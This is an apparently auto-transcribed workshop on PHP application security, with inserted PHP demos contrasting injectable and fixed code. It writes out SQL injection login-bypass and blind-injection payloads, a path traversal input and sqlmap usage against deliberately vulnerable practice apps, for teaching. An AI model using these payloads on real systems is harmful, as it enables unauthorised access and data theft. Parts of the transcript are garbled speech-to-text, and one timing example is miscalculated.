PHP has been something that I started with. It's a romance that I had with PHP, because it's one of the first languages which has every security issue that you could really think of. I've been pen testing for close to 12 years now. Am I audible at the last two? I can't shout more; I probably need a mic. So I've done my introduction, I'm going to repeat it again. Generally, a quick idea is that I've been pen testing, and pen testing is basically breaking the security of applications. Our job comes in... we're trying to redefine ourselves in the agile world these days, but predominantly it has been: applications get built, I'm called in, I find faults and the developers go fix them, and I basically recheck. That's how my job has been, but that's been changing a lot within agile; we're trying to do a few things differently these days, but that's for another talk at a later date. My SlideShare, my PowerPoint is not... one of the things I did yesterday night was upgrade my Mac. Bad idea. A lot of things are not working on my Mac right now, which also includes PowerPoint; my databases are screwed. But as it's a workshop it becomes easier for me, because you're going to do the job and I just have to walk around. Some things that are important for pen testing: why does a developer need to understand security? For one, sometimes security issues can be very costly; sometimes it means that you might have to redesign your whole application a certain way, and that could be a very costly episode. One of the reasons why you should be doing it is to understand what we are really looking at, and security guys are also people who understand code and who break according to what the code is. So it is something that you could do ahead of time. That's what it is basically; that's why we do these sessions.
The most important content that I'll be sharing can be dangerous. Please don't hack applications out in the real world; if you do, you're responsible for it, not me. So the way I have done it, the way I have learnt it, is I have given you a set of applications that are publicly available, like Mutillidae, DVWA. These are available, so these are there for you to play around with; there are multiple such things, I'll try and share as much as possible with you. But also, we write our own applications. If you've put in some of my code, there are some specific ones which are a little advanced, not necessarily there in DVWA, or some things where I find it a little wanting; we write our own, or we ask the developer to write it a certain way, and then we break into it and see what happens. So I've given you both of it. One thing that we do in security is, I sometimes write and my colleague breaks, my colleague writes and I break; that's how we work around it. So I have no content around it; please work with these instead of exploiting something out in the world, it's too dangerous. I'll try to do as little theory as possible but quick hands-on. How many of you know what security is, have some brush with it? How? Keeping people out. That's not actually the case, that's what people think it is. I'm a normal guy, you don't keep people out. Okay, I have a few show of hands, but let me... for now I'll try and cover a little bit towards basics and a little towards advanced, so that we get a little bit of a mix, you know, we do everything around. Some of the things that I picked up today: so PHP, I have a two-hour slot. Generally, if you go through the slides, it's a huge set; we do it over a period of two days. I was told I have two hours of time, so I tried bringing out some of the most unique things to PHP. What are the unique security issues that are there for PHP? I'm trying to bring them out here. There are others, so it should be a constant quest.
I'm sure. Yes, bigger, better? Thank you. I'm sorry, I'm not able to make it a slide show, the PowerPoint is crashing, so we'll have to do with this. How many of you have heard of SQL injection? The whole class? Someone wants to explain? I'll make it a little easier. Let's say there is an application, pretty much you've seen something like this: I use a name and password. Do you think this can be SQL injected? Like how? If you do a DROP TABLE, sure, is it really going to be useful to you, and what are the repercussions of doing a DROP TABLE? You don't want your administrator knowing that the site is down. Sure it can be done, but is that what you would do? Sure, what if it's easier? What's the first thing that you would want to do? The first step is to bypass the login itself, which is possible, you know. For me generally it starts with SQL injection, because that's the first hack I ever did. There was a site called Sunsilk Gang of Girls, it was an Indian-based site, and pretty young, not married before, wanted to know what women think, and that was the site we hacked. Thankfully the site is no more, I think it's not working. I'll try without; if I'm not audible just shout out and I'll try and come a little ahead and talk.
So the thrill of going into a website without having any authentication at all is truly exhilarating, amazing. Okay, so let's try this. If this is in place (I'm sure most of you understand SQL here, right? Most of you are developers), let's say this is the query that is there. How would you bypass this, sorry, how would you insert into this? This is a SELECT statement. Let's say we want to just bypass a login, what would you really do? Huh? Yes, yes. So the thing is, you do something like this. How many of you have heard about this? This is very common; if you read anything about SQL injection, everyone talks about this. Let's take a minute to understand this, because hacking is also about understanding what the underlying systems are doing. It's actually a very simple thing. Actually, there's a typo there: if you notice, in the user I have entered a single quote and in the explanation I have entered a double quote. Actually it's wrong, you should match the exact ones, so let's assume that there is a double quote there. So the first double quote that the user enters (we are assuming here that the user is entering it in the username) closes the double quote that the application has put, OR condition 1=1, and you basically put hyphen hyphen to comment out the rest of the query itself. Question to people: let's say this login table, or in this case the users table, has 100 records. How many records will come back as a response to this? Why? Huh? Yes, because 1=1 is true for all the records, and it's an OR condition here, so it's basically going to check every record and it will be true for all the records, and that is why you will get all the 100 records back. But technically you cannot log in with all the 100 records; how does the system work? It's a record set. They would probably have said give me a record set of 1 and you take the first record, and that is why technically you become an administrator, because when someone writes an application they generally enter the administrator record first. So there is no real guarantee that you become an administrator, but it works; but if you read through the documentation it doesn't generally come out so well. Okay, so first steps: if you've gone through my setup.txt I would want you to test this out. I want you to bypass a login and check. If you go to my link and go to setup.txt, there is a website there; it's run by a company called Acunetix. Find this website and bypass a login. Has everyone been able to install Zandt and all the other files that have been given? Just keep doing that as we talk, because we might need all of them. Do we need to keep moving this all the time? Any luck? Someone's done already? Imagine this is your real application, you get paid to do this. Anyone done already? Yes? So you don't have any credentials at the moment, you've got a login, go on. The tough thing here is to walk around, to walk around, see what's happening. It's done. So you're on this website, right? Now you don't have credentials; I want you to log into this application, as simple as that. So you'll have to find out where the login page is first and then try logging into the application. Sorry? So that's a good one: there is a test user there, please don't use it. We have to learn SQL injection, so try doing it with SQL injection. So don't use test. That test is basically... there is another school of thought that it is a brute-forceable user ID there, it's a different kind of an attack. So this application has multiple such security issues within itself; there are lots of issues, you know, this is not the only security issue that is there in this application, it has lots of security issues, one of them being the guessable username and password also. Did you log in? Why? No, you're complicating it way too much.
Your spaces are wrong. Did you finish? It's in the setup.txt; open setup.txt and you should be able to see it. It's done. I'm not going to tell you that; it could be anything, but you could generally take guesses. If it's a PHP-based application, it will generally use MySQL. But that's actually a good question, that brings out a very good point that she brought out: the first thing that you think of for a SQL injection is, you have to understand what the background database could be. Sometimes we will not know the answer directly, so you have to take assumed guesses, and the general idea is: if it's an MS SQL or an ASP-based application, it's MS SQL Server; if it's MySQL, mostly it's a PHP-based application. That's generally the idea. The reason for that is, there are subtleties in how SQL works, so you need to follow the right SQL syntax for the database. I've been noticing that a few people are making mistakes with spacing; you'll have to be careful about how you put spaces. And how many of you knew what I was doing when I put those hyphens? What does that mean? Correct. So let me give you a clue here: this is a MySQL database. In MySQL, the comment is hyphen hyphen space; it has to have a space after the hyphens. If you don't, MySQL will not work. Yes. So the way I work with it is, I always put hyphen hyphen space hyphen (`-- -`), so that I visually know that there is a space in there. With that, is anybody able to finish it? You're done? Awesome. How about you? No idea? Let's go, let's say, go on, let's see what happens. No, no, no, we're not doing that. So the first thing you have to assume is, a username is going to be a string, so we don't know the user. No, let's not do that. So let's say a single quote; this single quote will close the quote that the user has opened there. Okay, you say: OR, space, 1=1, hyphen hyphen space hyphen. Close it? We've already closed it, see this, we've already closed it.
So we don't want to close it, because we don't bother about what is there behind. Oh I see, so this part, username, is closing the actual... yes, and there's one trailing, so we remove this. You're administrator. "I'm very like, I just query the, like that, that's now, yeah, I need to go in this specific part." You think? Oh no, wow, I don't know. Stick to the login. But where are you able to do the login? Oh, it's going into the... yes, so you've not logged in yet. So type it out, let's see what you're typing. See, first things first, there has to be a space. Okay, so single quote. So you have to understand what the single quote is doing. When they're writing the query, the user, they would have started with the single quote, right? So you need to close out that query; it has to make valid SQL statements. So you take the first one and you close it with the second one; this single quote will close the single quote. Then space, OR. So you just do single quote, space, OR. What is that? OR 1=1. What is this in between? That's wrong. Go here, so, sorry, so remove that space, put hyphen hyphen, space hyphen. Login. You're administrator. Okay, for people who have not done it, let me show it to you. So think of it like this (are you able to see my screen?): you start with a single quote, the reason being you want to comment out the entry that the user has put; then you put OR 1=1 hyphen hyphen space hyphen, and you log in. That's it. Now I'll throw a challenge to you people. The challenge is: you know that there is a user called test, right? Use test, but don't use the password test. Log in as user test; there is a user test within the application. So if you look at this, where is log out? Okay, now, so you have test, right, but you don't know... let's say we assume we don't know the password of test, but you have to log in as test. How would you do it? It's all SQL, think about it.
It's along the same lines of what we spoke about. You have to log in as the test user now, and I'd like to see the query string you will enter. Don't use the same one; there is a different one that you can do. Okay, then show me. It's the same type, it's just that you don't know... See, in this case what it is basically saying is, I don't know what username you have, you match all conditions and it's giving you back this. I want it with test itself. Like what? Sorry? Sure, because the SQL injection exists in the password also; I want it in test, so in the username you only should have test. Let's say you don't know the password. Yes, that's a good one. Just to clarify how I want it: you know that only your username is injectable; the word test should appear in the username. Does it make sense? It's actually simpler than what we did. Think about it: what did we do? Just to get your quick attention, what did we do? When we do this, what are we really doing? Let's go back to the presentation. What are we really doing here? See, if you notice, what we are really doing here is: this is what the developer has written, right? User input will come inside between these brackets and this between these brackets, correct? We put a single quote and we closed this one, and we did this whole thing. So what it effectively did is, all the records come, the first record is picked up and then given to you. Now we know that there is a user test. Imagine in a real-world scenario there could be an administrator, and the username could have a SQL injection in it; how will you log in as admin? It's actually simpler than what we did. You've been able to do it? Correct, that's the exact right way I think, but it could be done more elegantly. Let me just show you. Let's log out... now I'm saying it's perfect, I actually like what you said, it's just not logging out. So the whole idea is you're logging in as the test user here; you don't have to bother about the rest, you just have to comment off everything. As simple as that, so that's enough, that's it. Why? You've already closed it here, right? You don't need to close it, and if it's commented out, everything behind it is, don't care, so you don't have to bother about it, right? That should do the job; that's the more elegant way of doing it. Hello guys, have you been able to do it? Sure. Did you do the first one? Did it work for you? Did the second one work for you? Perfect. Think through it. See, now there is a user called test in the database, and we know it is guaranteed that test exists. So basically think from the query: what does it really say? SELECT *. So when you're programming something, you're going to say, if a record set object is coming back with some response, it is a valid user. If that is the case, how do you go about doing it? So all you have to do is SELECT * from only test, and the rest, I don't care. That's your answer. Did you do it? Just test. No? Yes, you just have to log in as test, but you don't know the password. No, you cannot enter it there, there's nothing to be entered in the password, but you have to log in as test. Yes, the test username, correct. Yes, you have to write... did you give a space here? Yes, I will do it, but did you understand why it's happening? Yes. So you put it after test, because there is a single quote there, and after that your test should close the username and the rest of it is gone. Try it on; I'll show it in a few minutes. Did it work? I think you should have done it, right? So I want you to log in as test, not using any OR 1=1 or anything like that. So basically saying that you have to log in as test. Can I see yours? "I used the same approach." No, that's not the right approach. You want another approach? Yes, which is using... think, think, using what query? So let's say you have a user test in there. You can log into the Wi-Fi? I can't... allow me. Michael already did. Okay, can you help me with the computer? "IDA at great labs." Did it log in? Yeah, as test? Yeah, switch it around. What do you mean by that? Can I see? So here, I just had test, okay, and then I just did the... No, no, you are not putting anything in the password. Cannot. I'll come in a second. Yes, no, you cannot enter anything in the password, just a blank password. Just to remove your confusion: it is a blank password, you cannot enter any password. No, you cannot. Why do you have to? It doesn't have to be; there are other ways to... See, it's all about learning how SQL works. In this application it will, in the real world it won't, that's why. Yes, it has to be blank, and then you still have to become test. It's all SQL, it's all how you play around with SQL. Can I? Perfect, I see a few people who have already completed it. Can we give a minute, or should I show you how to do this? You just didn't do what I wanted. See, the reason I did this, the reason I want you to do this, is to understand how it... See, every document that you read always talks about only OR 1=1. A developer could write a regular expression on his back end and say, remove OR 1=1, if I see anything like that, I will not let you log in; that's how blacklists work, right? So that does not mean SQL injection is not there, so you need to know different ways of doing things. One of the ways I wanted to challenge you was to log in as test without putting anything in the password. But we log in, I think a few people did. Do you want to show them how to do it? Good, you can come to my machine and do it. You got it? Won't work, because you didn't give a space, that's it. Didn't it make sense to you why it happened? The single quote after test closes the username, and then we put a comment entry to close off the whole query after that, so we don't care about the password condition at all. As simple as that. So you're starting to understand how it really works behind the wheel when you write database queries.
Yes. So in the real world today it becomes a little more difficult; nobody writes direct SQL anymore, we use ORMs. How ORMs work is they internally use SQL, but they use parameterized queries. How many of you have heard what a parameterized query is? One, two, three. Okay, let's continue with the presentation, I wanted to show you a few more things; let's come back to this a little bit later. So what do you understand? From what we did, what were some of the main things you thought was the problem of SQL injection? "Short" was one way. What it really means is you can dynamically modify the query itself; that's the problem. A parameterized query takes that away: it does not allow you to modify the query, and that's the secret of a parameterized query. Every application logic today supports parameterized queries; you should be looking, if you have to write... So though we use a lot of... The reason why we need to know this is, I work for an organization where we use a lot of ORM, but there are scenarios where we have to write dynamic queries; there are scenarios where we have to do multiple joins across, so many things that ORMs cannot handle, and we have to write a query at that point of time. We take extreme care as to whether we are creating a SQL injection kind of environment. How do we check all those things? We check what user input is going into the query itself, will it be able to manipulate it; only if we are very sure about it, we let it pass into those queries. Though the number of such queries is very, very small, and most of the time the ORM should be able to satisfy the job that we really want, there are scenarios where... if you look at the ORM itself, it has some functionality where you can allow generic SQL; if that is the case you have to be extremely careful, and it helps to understand these things. Now let me talk a little bit about a MySQL-specific thing. How many of you knew within MySQL there was something called magic quotes? What are magic quotes? I cannot really hear you. It adds slashes, so when we put that single quote, right, it prefixes it with a slash and it basically breaks the query. This is a security feature the older versions of MySQL used to include by default, but this was discontinued; MySQL decided to pull it out, because of a problem that people started having: people started believing that because magic quotes exist, we can write bad queries, we can do anything and it will never break. Security is never driven that way. The problem that people started was, they were like, oh it's comfortable, it will just take care of it, we do not have to bother about it. The result of that was the magic quotes could be bypassed: if you could send your payloads in hex, it would bypass it, the magic quotes would not be able to detect it. And that's the reason why they said, okay, as developers you should be writing good code; don't depend on the frameworks, ORMs or no ORMs. I think it's something that you have to continuously keep looking at, whether we are writing good code there. So this was some of the basic SQL injections. Now I was actually going to be talking a little bit about something like this. Are we doing good on time?
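The login query the workshop keeps coming back to, as an added example that is not code from the talk or from the Acunetix/DVWA test applications: it runs the same query both ways in PHP, spliced together from strings and then as a prepared statement, so you can see why the two inputs used above (`' OR 1=1 -- -` and `test' -- -`) work against the first and do nothing against the second. It goes one step beyond the login case by adding a numeric id lookup, which is where `addslashes()` (what magic quotes did automatically) gives no protection at all, since that input needs no quote character; the true/false comparison on it is the same behaviour check the talk uses for blind SQL injection. It assumes PHP 7.4 or later with the pdo_sqlite extension; SQLite stands in for MySQL, and the table, rows, function names and every input are constructed for the demo.

```php
<?php
// Added example for this write-up, not code from the talk or the test apps.
// PDO with an in-memory SQLite database stands in for MySQL so it runs offline;
// the table, the two rows and every input below are constructed for the demo.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
// The administrator row is inserted first, which is why "OR 1=1" hands you that account.
$db->exec("INSERT INTO users (username, password) VALUES ('admin', 'constructed-admin-pw')");
$db->exec("INSERT INTO users (username, password) VALUES ('test', 'test')");

/** Vulnerable: the input becomes part of the SQL text and can change the query. */
function loginUnsafe(PDO $db, string $user, string $pass): ?string
{
    $sql = "SELECT username FROM users WHERE username='$user' AND password='$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC); // first record of the result set
    return $row === false ? null : $row['username'];
}

/** Fixed: the query text never changes; the values travel separately as parameters. */
function loginSafe(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare('SELECT username FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['username'];
}

/** Numeric id spliced in without quotes. addslashes() reproduces what magic quotes
 *  did automatically: it escapes quote characters, but this input contains none. */
function userByIdUnsafe(PDO $db, string $id): int
{
    $escaped = addslashes($id);
    return count($db->query("SELECT id FROM users WHERE id=$escaped")->fetchAll());
}

/** Fixed: reject anything that is not an integer, then bind it as one. */
function userByIdSafe(PDO $db, string $id): int
{
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $stmt = $db->prepare('SELECT id FROM users WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return count($stmt->fetchAll());
}

// The two inputs from the talk, typed into the username field with a blank password.
$bypass = "' OR 1=1 -- -";   // closes the quote, matches every row, comments out the rest
$asTest = "test' -- -";      // names a known user, comments out the password check
printf("unsafe, OR 1=1 payload  : %s\n", loginUnsafe($db, $bypass, '') ?? 'refused');
printf("unsafe, test'-- payload : %s\n", loginUnsafe($db, $asTest, '') ?? 'refused');
printf("safe,   OR 1=1 payload  : %s\n", loginSafe($db, $bypass, '') ?? 'refused');
printf("safe,   test'-- payload : %s\n", loginSafe($db, $asTest, '') ?? 'refused');
printf("safe,   real credentials: %s\n", loginSafe($db, 'test', 'test') ?? 'refused');

// Error-based signal: one unmatched quote leaves the statement unterminated and
// the database reports a syntax error instead of a result.
try {
    loginUnsafe($db, "'", '');
} catch (PDOException $e) {
    printf("unsafe, lone quote      : database error (%s)\n", $e->getMessage());
}

// Boolean signal on the numeric endpoint: a true and a false condition give
// different row counts even though neither produced an error.
printf("unsafe, id=1 AND 1=1    : %d row(s)\n", userByIdUnsafe($db, '1 AND 1=1'));
printf("unsafe, id=1 AND 1=2    : %d row(s)\n", userByIdUnsafe($db, '1 AND 1=2'));
try {
    userByIdSafe($db, '1 AND 1=2');
} catch (InvalidArgumentException $e) {
    printf("safe,   id=1 AND 1=2    : %s\n", $e->getMessage());
}
printf("safe,   id=1            : %d row(s)\n", userByIdSafe($db, '1'));
```

Run it with `php` on the command line. One caveat on the comment syntax: MySQL needs `-- ` with the trailing space the talk insists on, while SQLite accepts `--` with or without it, so the `-- -` form behaves the same on both and is the one to keep in your head. The prepared statement never sees a changed query: the payload is compared, as a literal string, against the username column and simply does not match.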
Okay, I will just give you a quick brush-through and move to the other ones, because I still want to cover some sets of things. Sometimes you may not get errors; here we were getting them. One quick thing someone can actually try: put a single quote and just press enter, and see how the system responds. Within your application here, just put a single quote and press enter, see what the system does. Unfortunately it's not... but generally applications give out an error. When you put a single quote and you don't terminate it, MySQL creates an error saying null-terminated string; so basically saying there is one extra single quote, I had two but it's become three now and it's not closed. So it basically says a null-terminated string is there, or some kind of error is there, which basically says you control the MySQL environment. This is called an error-based SQL injection. Sometimes errors will not come back; there will not be something that will tell you that there is a database in the background. How do you deal with that then? Sorry?
Sure, that's the way it is, but there's a concept called blind SQL injection. What it means is you manipulate your queries in such a way that you will be able to understand that you can control this query. Let me actually show you a demo instead of you doing this. Are you able to see the URL here? This is the URL that is there. Okay, now let's say there is no error coming back and I have to do a blind SQL injection. Something that I will be doing is... see, it's the same values, but I will just copy this. Now, the next one that I entered was this. Do you see a difference? Yes, correct, but how is this helpful in this context? I am sure everyone knows it's a 1 and a 2. It's actually very simple. Think of the behaviour changes that happened: you saw a behaviour change, the first one showed some data, the second one there was no data. That itself should tell you something: that means I can control the query. Also please notice `art=1` is the default one; that is what the developer had thought, but we are now adding content into it. What did we add? `%20`, which basically means space, and we've put an AND condition there and said `AND 1=1`, which basically means art=1 AND 1=1. Is 1=1? Yes. When you put an AND condition, both have to be true, correct? That's how logic is, right? It's an AND operator, so it effectively means both have to be true. In the second one, 1=2 is not true, so it becomes false; true AND false is always false. That's the behaviour that we are really looking at. Does that make sense to you? So sometimes even if you don't have errors we can use things like this to find out whether it is injectable. Now you can continue to work on this, because we'll have to save some time, do the others also; we will cut this out. One thing I'll tell you is there is a tool called sqlmap. How many of you have heard of this? It's a Swiss knife for SQL injections. You may just want to download this from this specific URL. All you have to do is, sqlmap is a Python-based application, so it's `sqlmap.py -u` and give the URL; it will do the attacking for you, you don't have to bother. But learn the fundamentals. It's very useful to learn the fundamentals before you start using the tools, largely because there will be scenarios where the tools will not be able to find problems. We've not covered things like second-order SQL injections; those are not something that sqlmap really works well with, but it's a little advanced for the specific session we are in. Maybe once you build up a little bit of context we can come back and do those things. Just to add a little bit: AND 1=1 and 1=2 is not necessarily the only way. Sometimes you can ask the database to sleep for a few minutes. So let's say you take a request, and the request takes 20 microseconds and you sleep for 100 microseconds; your total response time becomes 120 seconds. You know you control that environment; you can totally take over the database. Okay, let me... how many, all of you have installed XAMPP? Show of hands if everyone has installed XAMPP. You're done, or you... XAMPP. Okay, so let me quickly show you, once you install XAMPP. I have a Mac; Windows users, I don't know how, but it shouldn't be much different. I'll come and see yours if it's coming to it. Won't work? Maybe you'll have to pair with someone. So we're now going to use an attack... a tool called DVWA. We're now going to look at one of the very famous PHP attacks called file inclusion. How many have heard what a file inclusion attack is? Okay, I keep getting one hand up. See, one of the most... if you typically looked at a PHP-based application, and if it was at least 10 years old, you can be guaranteed that there is a file inclusion attack, because that was the norm, that was the design pattern they used, so you would definitely see it. But what it effectively means is, when a script loads a file (a file could be from a local host, sorry, the local machine itself) and it is using that to display some content, and if you can control that file or what it is going to load, you have a file inclusion attack. To do this you need to install DVWA. The way you do it is very simple: once you've installed XAMPP, if you have downloaded DVWA, it is a zip file; unzip that file and place it into your htdocs folder. If we do this for today, that should be enough, because that creates a hacking platform for you to play around with. DVWA has multiple security issues; I'm just looking at one of them today, because we'll keep moving one after the other. Very good question. Now, if you download this, please assume that if you put it on your machine, remove it before you even do any browsing or any of those things, because these are vulnerable applications, and if you run a database as root and you're on the internet, someone can use this to hack you. These are purpose-built vulnerable applications; please do take care with them. It's not just exploitation, these are exploitable. That's a good question, so please do take care, use them but... So the way I work is, I always know that I will shut down my servers; I know my servers are there, I will shut them down, period, and use your firewalls, basically, and use it with care. Are you doing it, or you don't want to do it? Sure, go ahead. "Because I have an SSH key, maybe put a VM and use a VM to do it. I have the... it's all in htdocs already, right, so I can actually put it there." Yeah, but you can create a VM, install XAMPP inside the VM, right, it's a separate environment. My content is all separated on a VirtualBox, so you can do something like use your Docker or use your VM to do the job, or pair with someone. The problem is I may not be able to show some of it, because my database is not working, so you'll have to pair up with someone who's doing it. "Is it possible that this kind of app is actually stealing your SSH key?" No, it's not.
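The page-loading pattern just described, as an added example that is not DVWA's code or the talk's: a page name taken straight from the request decides which file PHP includes, placed beside a version that maps the request onto a fixed set of files and refuses everything else. It writes its page files and one out-of-scope file into a temp directory (constructed for the demo, not part of any real application) so it runs stand-alone with `php` and cleans up after itself; the function and directory names are the example's own.

```php
<?php
// Added example for this write-up, not DVWA's own code. The page files and the
// out-of-scope file are constructed in a temp directory so the script runs alone.
declare(strict_types=1);

$dir = sys_get_temp_dir() . '/inc-demo-' . getmypid();
mkdir($dir);
mkdir("$dir/pages");
file_put_contents("$dir/pages/home.php",  "<?php echo \"home page\\n\";\n");
file_put_contents("$dir/pages/about.php", "<?php echo \"about page\\n\";\n");
// Sits outside pages/: stands in for any readable file on the host.
file_put_contents("$dir/outside.txt", "contents of a file that was never meant to be served\n");

/** Vulnerable: the request parameter decides the path, so it also decides the file. */
function showPageUnsafe(string $pagesDir, string $page): void
{
    include "$pagesDir/$page";   // "../" inside $page leaves $pagesDir
}

/** Fixed: the request chooses a key in a fixed map; file names never come from input. */
function showPageSafe(string $pagesDir, string $page): bool
{
    $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    if (!array_key_exists($page, $allowed)) {
        return false;            // refused; a real app would log this and show a generic error
    }
    include $pagesDir . '/' . $allowed[$page];
    return true;
}

echo "-- intended use --\n";
showPageUnsafe("$dir/pages", 'home.php');
showPageSafe("$dir/pages", 'about');

echo "-- request points outside pages/ --\n";
showPageUnsafe("$dir/pages", '../outside.txt');   // include prints a non-PHP file verbatim
$served = showPageSafe("$dir/pages", '../outside.txt');
echo $served ? "served\n" : "refused\n";

// Remove the constructed files again.
foreach (["$dir/pages/home.php", "$dir/pages/about.php", "$dir/outside.txt"] as $f) {
    unlink($f);
}
rmdir("$dir/pages");
rmdir($dir);
```

The point to take from the second run is that `include` does not care whether the file it is handed is PHP; anything else is copied to the output as-is, which is what turns "load a page by name" into "read a file by name". The allow-list version never builds a path from the request at all, so a traversal string is just an unknown key and there is nothing to escape or filter.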
see your app per se is not hacking you the app is not hacking you but let's say someone knows your url like my web servers have been tuned to that it'll work only on 127 nobody from outside can access those pages so if you do all those things yes but the app per se is not going to hack your machine you got the point but if you have these apps and you're on live someone else can hack using these apps on your machine that's what it is if your SSH keys are there it doesn't make a difference your app is not going to hack them excuse me did it answer your question so you can actually create a vm install it on a vm destroy the vm as you go stuff like that how will you learn otherwise see you have to be paranoid but does not mean you don't do it security is about being paranoid about what you do but you have to do the things so the way you do it is you create vm skips seclusions and you still learn what you have to learn have you been able to set it up have you been able to set it up dvwa running how long do i have to for another another hour okay maybe an hour and 15 minutes i'll use up yeah i have enough because this should need some uh it's already three right so four i'll should try and see because the other person will need some time at least right so okay now we gotta rush locals dvwa right huh the folder is dvwa so slash dvwa local hosts you put in yeah dvwa uh okay okay okay okay okay okay no there's a there's no i okay all right what uh okay change the name to uh quick question let's say you're browsing to a web application how will you know that the web server is a linux based line of a server or a windows based web server sorry let's say all the headers are removed someone is cleaning it up very well what could be some of the things that could be very subtle things which are very useful i saw him so i'm i just got the thought in my mind no do you know the behavior between cases between windows and linux upper case lower case a windows will support both the 
cases linux will not support it so you take a file and put it in all caps if it works and you try it in lower case if it doesn't work it's a linux machine if it works for both scenarios it's a windows machine the reason is why you did that is when i thought about it uh so you'll have to set up the server so hey why is it not able to connect okay so what you need to do is yeah so can you just go to the dvw then where's the dv config it's not complete yes inside config open this is this the password i think by default is empty like this is your database running it is running you don't need this okay so do you know what password you set for this i think it just download by default so what is the default can you just google for find out of a this is the exam for mmap this is the exam right so just say exam what is the default password sorry what is the password so then you need to put the password as root and then just check hold on that's okay that shouldn't be the problem it's not connecting so we need to everyone else has the same issue let me just check have you been able to set it up the exam okay anyone else done this till now has everybody has anyone been able to set up dvwa not able to you have a similar problem as me so what it is telling you is do you know what is the password for your mysql environment it's telling you that the password is wrong can you just google and find out what is the default password and then it says it's blank just put space yeah right but doesn't connect but is the dv correct or not the name database name correct uh is this the database no the first one is the database it's going to create that's okay okay okay so that should not be the problem it's not connecting to the database that's where it is there is a it is Apache because is will not support php right okay you can download exam for windows did it log in for you what is the problem you're having just i put password without the ad symbol yeah please work please work can you 
just give me this. Let's restart the... I'll just be back, let's look around and come back. Did it work for you now? Because my MAMP is still there. Maybe it's okay. You said you have MAMP, right? You're not going to use XAMPP, which is fine, which is not a problem. It's okay to remove the pages as you've deleted. You have to be careful, otherwise it's not going to work. So you're starting to look at sqlmap? Oh, you got it, you're running, yes. I don't know what to do here. admin, password: just put admin, password. How did you get... what is the password? Default password. Can I see your DB config? Yes, one login. So can you just give me the files, I want to... where did you install DVWA? Is this DVWA? I'll log in, go into it, go inside it. There is a db config, right? See if there is a db config. There is a config folder: cd config, cat config. Password is blank. No, for the MySQL I changed it, I didn't use the XAMPP, that's why. I really had an Apache, you had, okay, so I can't use your logic. Okay, but you seem to get it, so let's wait for a few minutes so that I know if it can work for you. So once you have the DVWA and you're logged in as admin, yes, you log in as admin, password. Okay, by default it's admin, password. Yeah, you've logged in? Yes. But what do you do after? I'll come to it, I'm hoping others also can do it. What's the problem? See, did you install XAMPP? It's not XAMPP, I have already PHP specifically installed on nginx, so I just set up everything. Then is this the password correct for the database? No, go down, go down, set up, create, reset database, click that, go down. Yes, it's done. Now we'll click login, go down, see there, login, admin, password. I'm sure you can help the others here. Have you been able to set it up? admin, password. Did it work for you guys? Put up the show... what do you need to install? Okay, just leave this. You want to install the DMG, right? Just double click and it's not... maybe it's something stopping. Yeah, it's not working, so maybe redownload it, it's not proper. Yeah, I redownloaded it just now. Yeah, earlier, yeah. Why is this working? Can you get up, I'll take your machine. Did it work for you? Okay, that's okay, you can use any web server, any environment, fine, shouldn't be a problem. Which one is better? Not... it's just installing a database with files, you can clean it up after that. You can give my name, shouldn't be... it's a known risk. I'll tell you what we're doing: we're pushing a set of PHP files and we're pushing a set of SQL files and we're installing the SQL files, that's it. You're not doing anything more than that. Okay, so once you're done, just delete the DVWA folder from your... that's it. Why are we running this, huh? This is going to set up the database in the background for us to play around. Yes, I thought we were trying to... I think we'll do it after this. Okay, so click that, click that button, go down. It's not connecting to your database, why? Are there any controls that are placed on you to install anything? Can you install any other applications? Can you install all applications? I'm saying basically you should be able to install any application. You're not able to. I'm not able to figure out why it is. Will it work for you? Correct, correct, correct. Just go to localhost/dvwa, the one that you posted, right out there, right? Did you paste it as dv? Change your folder name so it's easy. Oh yeah, the side, I have another copy. Did it work for you? Don't bother about it, don't need to have it, just setting the database. It's not connecting to your database, check if your database is right and then go to... see, once inside your dvwa folder, go inside, like this, go inside config, there's an include file there, check if your password is correct, change your password and save the new password and just create it. Go down, you're done, say login, admin, password. Why is it not coming? Did you shut down your database? Sorry, you shut down your Apache server? Just refresh, it should work for you. Maybe
you can just pair with her, if this is not working you can just join with her. Any of you all got it working? Sorry, the login? Oh, what's the login? admin, password. Were you able to set up? Not yet? Maybe you should pair up with someone. admin, password. Okay, I think most of you have been able to get it, so let's continue. Did it work for you guys? Let me show you, it's easier that way. Were you able to set it up? Why? Okay, we'll troubleshoot it, give me a second, we'll just save time.

Okay, once you log into your... can I have your attention? So I know some of you have been able to set it up; use this, you have it with you, you can set it up whenever you want. But what I want to do is something called file inclusion. Okay, we come to this page, click this page, look at the URL. The URL is something like this. What does it tell you? That's the URL; behind, I've just copy-pasted the URL so that you can easily see it. What is it telling you? People, you have done it, exploit it, show me what you can do with it. What do you guys think? Anyone? Okay, go on. You have to attack this, so how will you attack this? Think about it. Correct, sure, it's actually correct. So what kind of a file would you then write? But let's say this is a local file inclusion. So there are... she got a very good answer, she told me... I will not give you the answer yet because I want you to think through it. There are two kinds of inclusions: one is called a local file inclusion and one is called a remote file inclusion. And then what would you do? Think about it. I'm not going to do remote because it'll exploit my machine, but I'll show you something interesting. But you're thinking the right way. Did any one of you get what can be done if this is the kind of URL you see? How can you exploit this? Where can you upload a PHP file here? To anywhere? Yes, how will you attach the file here? You're going the right way, but where will you attach the PHP file? Sorry, there's no form.

